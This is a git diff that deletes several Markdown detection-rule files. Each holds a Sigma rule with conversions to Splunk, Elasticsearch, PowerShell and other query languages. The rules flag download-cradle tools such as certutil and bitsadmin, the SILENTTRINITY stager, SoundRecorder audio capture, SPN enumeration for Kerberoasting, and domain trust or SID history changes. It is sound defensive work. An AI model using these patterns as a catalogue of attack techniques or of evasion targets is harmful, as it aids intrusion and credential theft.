-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Administrative scripts</li><li>Microsoft SCCM</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html](https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.005</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows Shell Spawning Suspicious Program
-id: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde
-status: experimental
-description: Detects a suspicious child process of a Windows shell
-references:
-    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
-author: Florian Roth
-date: 2018/04/06
-modified: 2019/02/05
-tags:
-    - attack.execution
-    - attack.defense_evasion
-    - attack.t1064
-    - attack.t1059.005
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage:
-            - '*\mshta.exe'
-            - '*\powershell.exe'
-            # - '*\cmd.exe'  # too many false positives
-            - '*\rundll32.exe'
-            - '*\cscript.exe'
-            - '*\wscript.exe'
-            - '*\wmiprvse.exe'
-        Image:
-            - '*\schtasks.exe'
-            - '*\nslookup.exe'
-            - '*\certutil.exe'
-            - '*\bitsadmin.exe'
-            - '*\mshta.exe'
-    falsepositives:
-        CurrentDirectory: '*\ccmcache\\*'
-    condition: selection and not falsepositives
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Administrative scripts
-    - Microsoft SCCM
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.message -match "ParentImage.*.*\\mshta.exe" -or $_.message -match "ParentImage.*.*\\powershell.exe" -or $_.message -match "ParentImage.*.*\\rundll32.exe" -or $_.message -match "ParentImage.*.*\\cscript.exe" -or $_.message -match "ParentImage.*.*\\wscript.exe" -or $_.message -match "ParentImage.*.*\\wmiprvse.exe") -and ($_.message -match "Image.*.*\\schtasks.exe" -or $_.message -match "Image.*.*\\nslookup.exe" -or $_.message -match "Image.*.*\\certutil.exe" -or $_.message -match "Image.*.*\\bitsadmin.exe" -or $_.message -match "Image.*.*\\mshta.exe")) -and  -not ($_.message -match "CurrentDirectory.*.*\\ccmcache\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:(*\\mshta.exe OR *\\powershell.exe OR *\\rundll32.exe OR *\\cscript.exe OR *\\wscript.exe OR *\\wmiprvse.exe) AND winlog.event_data.Image.keyword:(*\\schtasks.exe OR *\\nslookup.exe OR *\\certutil.exe OR *\\bitsadmin.exe OR *\\mshta.exe)) AND (NOT (winlog.event_data.CurrentDirectory.keyword:*\\ccmcache\\*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3a6586ad-127a-4d3b-a677-1e6eacdf8fde <<EOF
-{
-  "metadata": {
-    "title": "Windows Shell Spawning Suspicious Program",
-    "description": "Detects a suspicious child process of a Windows shell",
-    "tags": [
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.t1064",
-      "attack.t1059.005",
-      "attack.t1059.001"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\mshta.exe OR *\\\\powershell.exe OR *\\\\rundll32.exe OR *\\\\cscript.exe OR *\\\\wscript.exe OR *\\\\wmiprvse.exe) AND winlog.event_data.Image.keyword:(*\\\\schtasks.exe OR *\\\\nslookup.exe OR *\\\\certutil.exe OR *\\\\bitsadmin.exe OR *\\\\mshta.exe)) AND (NOT (winlog.event_data.CurrentDirectory.keyword:*\\\\ccmcache\\\\*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\mshta.exe OR *\\\\powershell.exe OR *\\\\rundll32.exe OR *\\\\cscript.exe OR *\\\\wscript.exe OR *\\\\wmiprvse.exe) AND winlog.event_data.Image.keyword:(*\\\\schtasks.exe OR *\\\\nslookup.exe OR *\\\\certutil.exe OR *\\\\bitsadmin.exe OR *\\\\mshta.exe)) AND (NOT (winlog.event_data.CurrentDirectory.keyword:*\\\\ccmcache\\\\*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows Shell Spawning Suspicious Program'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:(*\\mshta.exe *\\powershell.exe *\\rundll32.exe *\\cscript.exe *\\wscript.exe *\\wmiprvse.exe) AND Image.keyword:(*\\schtasks.exe *\\nslookup.exe *\\certutil.exe *\\bitsadmin.exe *\\mshta.exe)) AND (NOT (CurrentDirectory.keyword:*\\ccmcache\\*)))
-```
-
-
-### splunk
-    
-```
-(((ParentImage="*\\mshta.exe" OR ParentImage="*\\powershell.exe" OR ParentImage="*\\rundll32.exe" OR ParentImage="*\\cscript.exe" OR ParentImage="*\\wscript.exe" OR ParentImage="*\\wmiprvse.exe") (Image="*\\schtasks.exe" OR Image="*\\nslookup.exe" OR Image="*\\certutil.exe" OR Image="*\\bitsadmin.exe" OR Image="*\\mshta.exe")) NOT (CurrentDirectory="*\\ccmcache\\*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (ParentImage IN ["*\\mshta.exe", "*\\powershell.exe", "*\\rundll32.exe", "*\\cscript.exe", "*\\wscript.exe", "*\\wmiprvse.exe"] Image IN ["*\\schtasks.exe", "*\\nslookup.exe", "*\\certutil.exe", "*\\bitsadmin.exe", "*\\mshta.exe"])  -(CurrentDirectory="*\\ccmcache\\*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*.*\mshta\.exe|.*.*\powershell\.exe|.*.*\rundll32\.exe|.*.*\cscript\.exe|.*.*\wscript\.exe|.*.*\wmiprvse\.exe))(?=.*(?:.*.*\schtasks\.exe|.*.*\nslookup\.exe|.*.*\certutil\.exe|.*.*\bitsadmin\.exe|.*.*\mshta\.exe))))(?=.*(?!.*(?:.*(?=.*.*\ccmcache\\.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_silenttrinity_stage_use.md b/Atomic_Threat_Coverage/Detection_Rules/win_silenttrinity_stage_use.md
deleted file mode 100644
index c5b294d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_silenttrinity_stage_use.md
+++ /dev/null
@@ -1,260 +0,0 @@
-| Title                    | SILENTTRINITY Stager Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects SILENTTRINITY stager use |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/byt3bl33d3r/SILENTTRINITY](https://github.com/byt3bl33d3r/SILENTTRINITY)</li></ul>  |
-| **Author**               | Aleksey Potapov, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: SILENTTRINITY Stager Execution
-id: 03552375-cc2c-4883-bbe4-7958d5a980be
-status: experimental
-description: Detects SILENTTRINITY stager use
-references:
-    - https://github.com/byt3bl33d3r/SILENTTRINITY
-author: Aleksey Potapov, oscd.community
-date: 2019/10/22
-modified: 2019/11/04
-tags:
-    - attack.execution
-detection:
-    selection:
-        Description|contains: 'st2stager'
-    condition: selection
-falsepositives:
-    - unknown
-level: high
----
-logsource:
-    category: process_creation
-    product: windows
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 7
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Description.*.*st2stager.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "7" -and $_.message -match "Description.*.*st2stager.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Description.keyword:*st2stager*
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"7" AND winlog.event_data.Description.keyword:*st2stager*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/03552375-cc2c-4883-bbe4-7958d5a980be <<EOF
-{
-  "metadata": {
-    "title": "SILENTTRINITY Stager Execution",
-    "description": "Detects SILENTTRINITY stager use",
-    "tags": [
-      "attack.execution"
-    ],
-    "query": "winlog.event_data.Description.keyword:*st2stager*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Description.keyword:*st2stager*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SILENTTRINITY Stager Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/03552375-cc2c-4883-bbe4-7958d5a980be-2 <<EOF
-{
-  "metadata": {
-    "title": "SILENTTRINITY Stager Execution",
-    "description": "Detects SILENTTRINITY stager use",
-    "tags": [
-      "attack.execution"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"7\" AND winlog.event_data.Description.keyword:*st2stager*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"7\" AND winlog.event_data.Description.keyword:*st2stager*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SILENTTRINITY Stager Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Description.keyword:*st2stager*
-(EventID:"7" AND Description.keyword:*st2stager*)
-```
-
-
-### splunk
-    
-```
-Description="*st2stager*"
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="7" Description="*st2stager*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Description="*st2stager*")
-(event_id="7" Description="*st2stager*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*st2stager.*'
-grep -P '^(?:.*(?=.*7)(?=.*.*st2stager.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_soundrec_audio_capture.md b/Atomic_Threat_Coverage/Detection_Rules/win_soundrec_audio_capture.md
deleted file mode 100644
index 5418a1f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_soundrec_audio_capture.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Audio Capture via SoundRecorder       |
-|:-------------------------|:------------------|
-| **Description**          | Detect attacker collecting audio via SoundRecorder application |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0009: Collection](https://attack.mitre.org/tactics/TA0009)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1123: Audio Capture](https://attack.mitre.org/techniques/T1123)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1123: Audio Capture](../Triggers/T1123.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate audio capture by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html](https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Audio Capture via SoundRecorder
-id: 83865853-59aa-449e-9600-74b9d89a6d6e
-description: Detect attacker collecting audio via SoundRecorder application
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html
-tags:
-    - attack.collection
-    - attack.t1123
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\SoundRecorder.exe'
-        CommandLine|contains: '/FILE'
-    condition: selection
-falsepositives:
-    - Legitimate audio capture by legitimate user
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\SoundRecorder.exe" -and $_.message -match "CommandLine.*.*/FILE.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\SoundRecorder.exe AND winlog.event_data.CommandLine.keyword:*\/FILE*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/83865853-59aa-449e-9600-74b9d89a6d6e <<EOF
-{
-  "metadata": {
-    "title": "Audio Capture via SoundRecorder",
-    "description": "Detect attacker collecting audio via SoundRecorder application",
-    "tags": [
-      "attack.collection",
-      "attack.t1123"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\SoundRecorder.exe AND winlog.event_data.CommandLine.keyword:*\\/FILE*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\SoundRecorder.exe AND winlog.event_data.CommandLine.keyword:*\\/FILE*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Audio Capture via SoundRecorder'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\SoundRecorder.exe AND CommandLine.keyword:*\/FILE*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\SoundRecorder.exe" CommandLine="*/FILE*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\SoundRecorder.exe" CommandLine="*/FILE*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\SoundRecorder\.exe)(?=.*.*/FILE.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_spn_enum.md b/Atomic_Threat_Coverage/Detection_Rules/win_spn_enum.md
deleted file mode 100644
index 916e13b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_spn_enum.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Possible SPN Enumeration       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Service Principal Name Enumeration used for Kerberoasting |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1208: Kerberoasting](https://attack.mitre.org/techniques/T1208)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrator Activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation](https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation)</li></ul>  |
-| **Author**               | Markus Neis, keepwatch |
-| Other Tags           | <ul><li>attack.t1558.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible SPN Enumeration
-id: 1eeed653-dbc8-4187-ad0c-eeebb20e6599
-description: Detects Service Principal Name Enumeration used for Kerberoasting
-status: experimental
-references:
-    - https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation
-author: Markus Neis, keepwatch
-date: 2018/11/14
-tags:
-    - attack.credential_access
-    - attack.t1208
-    - attack.t1558.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_image:
-        Image: '*\setspn.exe'
-    selection_desc:
-        Description: '*Query or reset the computer* SPN attribute*'
-    cmd:
-        CommandLine: '*-q*'
-    condition: (selection_image or selection_desc) and cmd
-falsepositives:
-    - Administrator Activity
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.ID -eq "1") -and ($_.message -match "Image.*.*\\setspn.exe" -or $_.message -match "Description.*.*Query or reset the computer.* SPN attribute.*") -and $_.message -match "CommandLine.*.*-q.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\setspn.exe OR winlog.event_data.Description.keyword:*Query\ or\ reset\ the\ computer*\ SPN\ attribute*) AND winlog.event_data.CommandLine.keyword:*\-q*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1eeed653-dbc8-4187-ad0c-eeebb20e6599 <<EOF
-{
-  "metadata": {
-    "title": "Possible SPN Enumeration",
-    "description": "Detects Service Principal Name Enumeration used for Kerberoasting",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1208",
-      "attack.t1558.003"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\setspn.exe OR winlog.event_data.Description.keyword:*Query\\ or\\ reset\\ the\\ computer*\\ SPN\\ attribute*) AND winlog.event_data.CommandLine.keyword:*\\-q*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\setspn.exe OR winlog.event_data.Description.keyword:*Query\\ or\\ reset\\ the\\ computer*\\ SPN\\ attribute*) AND winlog.event_data.CommandLine.keyword:*\\-q*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible SPN Enumeration'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\setspn.exe OR Description.keyword:*Query or reset the computer* SPN attribute*) AND CommandLine.keyword:*\-q*)
-```
-
-
-### splunk
-    
-```
-((Image="*\\setspn.exe" OR Description="*Query or reset the computer* SPN attribute*") CommandLine="*-q*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\setspn.exe" OR Description="*Query or reset the computer* SPN attribute*") CommandLine="*-q*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*.*\setspn\.exe|.*.*Query or reset the computer.* SPN attribute.*)))(?=.*.*-q.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_add_domain_trust.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_add_domain_trust.md
deleted file mode 100644
index a2829d7..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_add_domain_trust.md
+++ /dev/null
@@ -1,168 +0,0 @@
-| Title                    | Addition of Domain Trusts       |
-|:-------------------------|:------------------|
-| **Description**          | Addition of domains is seldom and should be verified for legitimacy. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate extension of domain structure</li></ul>  |
-| **Development Status**   | stable |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Thomas Patzke |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Addition of Domain Trusts
-id: 0255a820-e564-4e40-af2b-6ac61160335c
-status: stable
-description: Addition of domains is seldom and should be verified for legitimacy.
-author: Thomas Patzke
-date: 2019/12/03
-tags:
-    - attack.persistence
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4706
-    condition: selection
-falsepositives:
-    - Legitimate extension of domain structure
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4706") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4706")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0255a820-e564-4e40-af2b-6ac61160335c <<EOF
-{
-  "metadata": {
-    "title": "Addition of Domain Trusts",
-    "description": "Addition of domains is seldom and should be verified for legitimacy.",
-    "tags": [
-      "attack.persistence"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4706\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4706\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Addition of Domain Trusts'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:"4706"
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4706")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4706")
-```
-
-
-### grep
-    
-```
-grep -P '^4706'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_add_sid_history.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_add_sid_history.md
deleted file mode 100644
index d196b74..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_add_sid_history.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Addition of SID History to Active Directory Object       |
-|:-------------------------|:------------------|
-| **Description**          | An attacker can use the SID history attribute to gain additional privileges. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1178: SID-History Injection](https://attack.mitre.org/techniques/T1178)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Migration of an account into a new domain</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://adsecurity.org/?p=1772](https://adsecurity.org/?p=1772)</li></ul>  |
-| **Author**               | Thomas Patzke, @atc_project (improvements) |
